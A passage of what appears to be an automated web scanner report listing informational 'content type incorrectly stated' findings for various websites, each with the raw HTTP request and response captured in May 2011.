The response contains the following Content-type statement: The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /advisor/images/st_twitter_header.gif HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
Referer: https://ww3.janus.com/advisor/about-janus?WT.mc_id=102162&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3eb3df310558d61360344c75b864; vj-ww3-advisor=3540783276.20480.0000; vj-ww3=3742109868.20480.0000; mbox=check#true#1305199510|session#1305199449262-866084#1305201310

Response

HTTP/1.1 200 OK
Server:
ETag: W/"859-1304985196443"
Last-Modified: Mon, 09 May 2011 23:53:16 GMT
Content-Type: image/gif
Content-Length: 859
Date: Thu, 12 May 2011 11:24:18 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

28.35. http://www.beneschlaw.com/files/ImageControl/be5e9886-616f-4c6d-972a-05c597caa379/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/go%20green%20(2).gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.beneschlaw.com
Path:   /files/ImageControl/be5e9886-616f-4c6d-972a-05c597caa379/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/go%20green%20(2).gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a BMP image.

Request

GET /files/ImageControl/be5e9886-616f-4c6d-972a-05c597caa379/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/go%20green%20(2).gif HTTP/1.1
Host: www.beneschlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.beneschlaw.com/
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1115; PortletId=6201; SiteId=1086; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=4pdcdw555vegmp55inbs05nz; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1085&RootPortletID=665&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=Web; ZoneId=7; NSC_QPE-FHB7374_TibsfQspe=ffffffff09df180c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Content-Length: 8118
Content-Type: image/gif
Last-Modified: Thu, 18 Dec 2008 20:31:02 GMT
Accept-Ranges: bytes
ETag: "087d8b4f61c91:1c5e"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000183
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A74
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:19:18 GMT

BM........6...(...U...P................................F..KKK.........je'......'..222..6..;<<.................+o...]*.........+++..y,.gw).................*l.."H.&b.........."""......d+..L......#[....
...[SNIP]...

28.36. http://www.butlerrubin.com/web/br.nsf/br_logo.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/br_logo.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /web/br.nsf/br_logo.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:26 GMT
Last-Modified: Tue, 10 May 2011 07:00:52 GMT
Content-Type: image/gif
Content-Length: 13722
ETag: W/"MTAtODA4Ny04NjI1Nzg1RTAwN0UzMjVDLTg2MjU3N0I0MDA2MTk2REQtRjVDREVCMjY3RkM0QTc0Njg1MjU3MDY3MDA2QjAzN0U="

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................P....
...[SNIP]...

28.37. http://www.butlerrubin.com/web/br.nsf/tableback.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/tableback.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /web/br.nsf/tableback.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:30 GMT
Last-Modified: Tue, 10 May 2011 07:00:52 GMT
Content-Type: image/gif
Content-Length: 39928
ETag: W/"MTAtODA4Ny04NjI1Nzg1RTAwN0UzMjVDLTg2MjU3N0I0MDA2MTk1RkYtQkU1NkQzNDQ0OUJEMUZENjg1MjU3MDc2MDA1NkI0OEM="

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

28.38. http://www.conferenceservers.com/browser/proxy.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.conferenceservers.com
Path:   /browser/proxy.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /browser/proxy.asp HTTP/1.1
Host: www.conferenceservers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.soundpatheview.com/

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR OPTa BUS OTC"
X-UA-Compatible: IE=EmulateIE8
X-Powered-By: ASP.NET
Content-Length: 843
Content-Type: text/html
Cache-Control: private
Date: Thu, 12 May 2011 12:25:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ASPSESSIONIDQCAATBRT=MCBAGIKBAKINNJGFEALBPACN; path=/


// WebDialogs WebInterpoint Client Login Utilities
// This file contains functions which are commonly used by login pages.

var proxy='173.193.214.243'; // This value was detected server side
fu
...[SNIP]...

28.39. http://www.digiware.net/templates/home/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.digiware.net
Path:   /templates/home/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /templates/home/favicon.ico HTTP/1.1
Host: www.digiware.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: f165d946d0a4013e03ebd5d7edb21d2c=o3ue90qurns4h4i2cgin7c1vg1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:07:08 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 05 Jun 2009 19:06:08 GMT
ETag: "28f8871-47e-46b9e95bc6800"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ................................/.................................................../......./.........................................................../


.


..

...[SNIP]...

28.40. http://www.digiware.net/templates/intena1/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.digiware.net
Path:   /templates/intena1/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /templates/intena1/favicon.ico HTTP/1.1
Host: www.digiware.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: f165d946d0a4013e03ebd5d7edb21d2c=o3ue90qurns4h4i2cgin7c1vg1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:06:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 05 Jun 2009 19:06:50 GMT
ETag: "28f893f-47e-46b9e983d4680"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ................................/.................................................../......./.........................................................../


.


..

...[SNIP]...

28.41. http://www.dmoc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.dmoc.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: www.dmoc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SESS97997ab7f65dbfa3475cc6e258e81de7=58296304a4b8ec99476daf96829e277a; has_js=1; __utma=101869332.609237140.1305202772.1305202772.1305202772.1; __utmb=101869332.1.10.1305202772; __utmc=101869332; __utmz=101869332.1305202772.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Diserio%20Martin%20O%27Connor%20%26%20Castiglioni

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:19:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 45
Content-Type: text/html; charset=iso-8859-1

The requested file favicon.ico was not found.

28.42. http://www.elawmarketing.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.elawmarketing.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:00:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 45
Content-Type: text/html; charset=iso-8859-1

The requested file favicon.ico was not found.

28.43. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php?api_key=100001111898866&app_id=100001111898866&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df10322942c%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2e5e42118%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8a04dca%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3a8785378%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8a04dca&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3e71225fc%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8a04dca&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfd5d15fc%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8a04dca&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.145.124
X-Cnection: close
Date: Thu, 12 May 2011 11:37:23 GMT
Content-Length: 17

Application Error

28.44. http://www.foxbusiness.com/authentication/logout/submit

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.foxbusiness.com
Path:   /authentication/logout/submit

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /authentication/logout/submit HTTP/1.1
Host: www.foxbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=E05510_10428; __qca=P0-1763937623-1305200279382; __qseg=Q_D|Q_T|Q_3995|Q_921|Q_922|Q_928|Q_929|Q_3994|Q_924|Q_2113|Q_2112|Q_2151|Q_2145|Q_2156|Q_2120; s_pers=%20s_vnum%3D1307792281979%2526vn%253D1%7C1307792281979%3B%20s_invisit%3Dtrue%7C1305202081979%3B%20omtr_lv%3D1305200281982%7C1399808281982%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305202081982%3B%20s_nr%3D1305200281985%7C1307792281985%3B%20s_prop45_cvp%3D%255B%255B%2527Referrers%2527%252C%25271305200281991%2527%255D%255D%7C1463053081991%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefineddealbook.nytimes.comdealbook.nytimes.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
X-FoxNews-EdgeTTL: 20m
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache
Date: Thu, 12 May 2011 11:38:06 GMT
Connection: close
Content-Length: 150

{"authentication":{"message":"User logged out, session invalidated","status":"ok","dqs":"e30= c5d5d037748a67e6b04679c3eadc2d7b0b1486fb 1305198974"}}

28.45. http://www.foxbusiness.com/static/all/generated/js/fb2-breaking-news.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.foxbusiness.com
Path:   /static/all/generated/js/fb2-breaking-news.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /static/all/generated/js/fb2-breaking-news.js HTTP/1.1
Host: www.foxbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=E05510_10428; __qca=P0-1763937623-1305200279382; __qseg=Q_D|Q_T|Q_3995|Q_921|Q_922|Q_928|Q_929|Q_3994|Q_924|Q_2113|Q_2112|Q_2151|Q_2145|Q_2156|Q_2120

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 11 May 2011 15:51:32 GMT
ETag: "1d7c726-19-bea2900"
Accept-Ranges: bytes
X-FoxNews-EdgeTTL: 2m
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=29
Expires: Thu, 12 May 2011 11:38:35 GMT
Date: Thu, 12 May 2011 11:38:06 GMT
Connection: close
Content-Length: 25

fox_header_breakingnews()

28.46. http://www.foxbusiness.com/static/all/img/global/logo-disqus-1.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.foxbusiness.com
Path:   /static/all/img/global/logo-disqus-1.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /static/all/img/global/logo-disqus-1.gif HTTP/1.1
Host: www.foxbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=E05510_10428; __qca=P0-1763937623-1305200279382; __qseg=Q_D|Q_T|Q_3995|Q_921|Q_922|Q_928|Q_929|Q_3994|Q_924|Q_2113|Q_2112|Q_2151|Q_2145|Q_2156|Q_2120; s_pers=%20s_vnum%3D1307792281979%2526vn%253D1%7C1307792281979%3B%20s_invisit%3Dtrue%7C1305202081979%3B%20omtr_lv%3D1305200281982%7C1399808281982%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305202081982%3B%20s_nr%3D1305200281985%7C1307792281985%3B%20s_prop45_cvp%3D%255B%255B%2527Referrers%2527%252C%25271305200281991%2527%255D%255D%7C1463053081991%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefineddealbook.nytimes.comdealbook.nytimes.com%3B%20s_sq%3D%3B; p_DQS=e30%3D%20c5d5d037748a67e6b04679c3eadc2d7b0b1486fb%201305198974

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 11 May 2011 18:05:03 GMT
ETag: "1d5cae7-488-e96851c0"
Accept-Ranges: bytes
Content-Length: 1160
Content-Type: image/gif
Cache-Control: max-age=7084
Date: Thu, 12 May 2011 11:38:13 GMT
Connection: close

.PNG
.
...IHDR...D.........&_A...OIDATx.u..O.I..`..O@..B.xd.s..d..dD.8....)h..\I.....~U.U........]]]]__.......g....................o..........>::z~~.x....2....0Ni..G............../....lnn...ZZZ...
...[SNIP]...

28.47. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Apollo+Global+Management HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: vD843DpA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:38:21 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 21875

ShjDd-Or....S....L..'..}.........vs#...Apollo Global Management.7%..krcbLTYDOKsby0gGQ8-jFBg",kEXPI:"17259,24472,25907,27147,28505,28766,28887,29229,29509,29685,29795,29822,30035,30107,30152,30275",kCS
...[SNIP]...

28.48. http://www.hbsr.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hbsr.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:30 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Jun 2010 21:40:13 GMT
ETag: "1170692-37e-48812ef55a940"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ............................... .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..J0.t`..........fP.... .. .. .. .. .. .. .. .. ........fP.X@.t`.......... .. .. .. .. .. ..
...[SNIP]...

28.49. http://www.korteco.com/sites/all/themes/korteco/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.korteco.com
Path:   /sites/all/themes/korteco/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sites/all/themes/korteco/favicon.ico HTTP/1.1
Host: www.korteco.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SESS31e5fbde7def436979bdb9291b5781da=0evqcgbv3nlct72jq5nho296j5

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:11:26 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 25 Feb 2011 17:35:38 GMT
ETag: "467932a-37e-c21b6e80"
Accept-Ranges: bytes
Content-Length: 894
Cache-Control: max-age=1209600
Expires: Thu, 26 May 2011 13:11:26 GMT
Connection: close
Content-Type: text/plain

..............h.......(....... ...........@........................................................................................u..t..~................................{..o..............g..q........
...[SNIP]...

28.50. http://www.mimecast.com/Global/HeaderTitleVideos/Images/SecurityV4.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mimecast.com
Path:   /Global/HeaderTitleVideos/Images/SecurityV4.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /Global/HeaderTitleVideos/Images/SecurityV4.png HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/What-we-offer/
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893; MimecastcomRegion=North America

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: image/png
Expires: Wed, 11 May 2011 12:38:18 GMT
Last-Modified: Tue, 18 Jan 2011 14:56:52 GMT
ETag: "1CBB71FF145C4AF"
Date: Thu, 12 May 2011 12:38:18 GMT
Content-Length: 76453

......Exif..II*.................Ducky.......P.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...

28.51. http://www.moritthock.com/index.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.moritthock.com
Path:   /index.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /index.php?css={stylesheet=global/nav HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moritthock.com/
Cookie: exp_last_visit=989860893; exp_last_activity=1305220893; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Content-Length: 11
Content-Type: text/html

Invalid URI

28.52. http://www.nytimes.com/adx/bin/adx_remote.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nytimes.com
Path:   /adx/bin/adx_remote.html

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

